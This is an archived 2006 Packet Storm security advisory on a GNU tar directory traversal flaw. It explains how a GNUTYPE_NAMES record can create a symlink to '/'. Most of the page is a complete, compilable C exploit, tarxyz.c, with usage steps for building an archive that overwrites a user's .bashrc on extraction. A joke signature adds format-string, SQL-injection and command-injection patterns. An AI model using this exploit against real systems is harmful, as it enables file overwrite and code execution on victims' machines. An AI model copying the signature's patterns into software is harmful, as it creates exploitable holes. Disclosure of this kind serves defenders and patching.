exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

gnutar.txt

gnutar.txt
Posted Nov 22, 2006
Authored by Teemu Salmela

GNU tar suffers from a directory traversal condition. Exploit included.

tags | exploit
SHA-256 | 9f117a005fa12ba3f2e915794a41b81dab5cc919959856eb45ec674d29544949

gnutar.txt

Change Mirror Download
GNU tar directory traversal
----------------------------------------------------------------------------
What is it?
When i download a tar file (warez.tar.gz in this example) from the web and
run the following commands:

$ mkdir ~/warez
$ tar xzf warez.tar.gz -C ~/warez

, then i would expect that tar doesn't create or replace any files outside
the ~/warez directory. Today, i was browsing the GNU tar source code trying
to find a way to create/overwrite arbitrary files, and i found it!

Normal tar symlinks/hardlinks are handled correctly in GNU tar (i think),
but there is one tar record type, called GNUTYPE_NAMES (this is some kind
of GNU extension, i think), that allows me to create symbolic links
(inside the ~/warez directory, in this example) pointing to arbitrary
locations in the filesystem. In the exploit, i make a sybolic link called
"xyz", pointing to "/". After that record, more records would follow
that extract files to the "xyz" directory.

Version numbers:
----------------------------------------------------------------------------
I tested this on Ubuntu 6.06 LTS, GNU tar 1.16 and GNU tar 1.15.1 (this one
comes with Ubuntu)

Vulnerable code:
----------------------------------------------------------------------------
See extract_archive() in extract.c and extract_mangle() in mangle.c.

Exploit:
----------------------------------------------------------------------------

/*
* tarxyz.c - GNU tar directory traversal exploit.
* Written by Teemu Salmela.
*
* Example usage (creates a tar file that extracts /home/teemu/.bashrc):
* $ gcc -o tarxyz tarxyz.c
* $ ./tarxyz > ~/xyz.tar
* $ mkdir -p /tmp/xyz/home/teemu/
* $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc
* $ cd /tmp
* $ tar -rf ~/xyz.tar xyz/home/teemu
*/

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

struct posix_header
{ /* byte offset */
char name[100]; /* 0 */
char mode[8]; /* 100 */
char uid[8]; /* 108 */
char gid[8]; /* 116 */
char size[12]; /* 124 */
char mtime[12]; /* 136 */
char chksum[8]; /* 148 */
char typeflag; /* 156 */
char linkname[100]; /* 157 */
char magic[6]; /* 257 */
char version[2]; /* 263 */
char uname[32]; /* 265 */
char gname[32]; /* 297 */
char devmajor[8]; /* 329 */
char devminor[8]; /* 337 */
char prefix[155]; /* 345 */
/* 500 */
};

#define GNUTYPE_NAMES 'N'

#define BLOCKSIZE 512

union block
{
char buffer[BLOCKSIZE];
struct posix_header header;
};

void
data(void *p, size_t size)
{
size_t n = 0;
char b[BLOCKSIZE];

while (size - n > 512) {
fwrite(&((char *)p)[n], 1, 512, stdout);
n += 512;
}
if (size - n) {
memset(b, 0, sizeof(b));
memcpy(b, &((char *)p)[n], size - n);
fwrite(b, 1, sizeof(b), stdout);
}
}

int
main(int argc, char *argv[])
{
char *link_name = "xyz";
union block b;
char *d;
int i;
unsigned int cksum;

if (argc > 1)
link_name = argv[1];

if (asprintf(&d, "Symlink / to %s\n", link_name) < 0) {
fprintf(stderr, "out of memory\n");
exit(1);
}
memset(&b, 0, sizeof(b));
strcpy(b.header.name, "xyz");
strcpy(b.header.mode, "0000777");
strcpy(b.header.uid, "0000000");
strcpy(b.header.gid, "0000000");
sprintf(b.header.size, "%011o", strlen(d));
strcpy(b.header.mtime, "00000000000");
strcpy(b.header.chksum, " ");
b.header.typeflag = GNUTYPE_NAMES;
strcpy(b.header.magic, "ustar ");
strcpy(b.header.uname, "root");
strcpy(b.header.gname, "root");
for (cksum = 0, i = 0; i < sizeof(b); i++)
cksum += b.buffer[i] & 0xff;
sprintf(b.header.chksum, "%06o ", cksum);
fwrite(&b, 1, sizeof(b), stdout);
data(d, strlen(d));
}

--
fscanf(socket,"%s",buf); printf(buf);
sprintf(query, "SELECT %s FROM table", buf);
sprintf(cmd, "echo %s | sqlquery", query); system(cmd);
Teemu Salmela


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close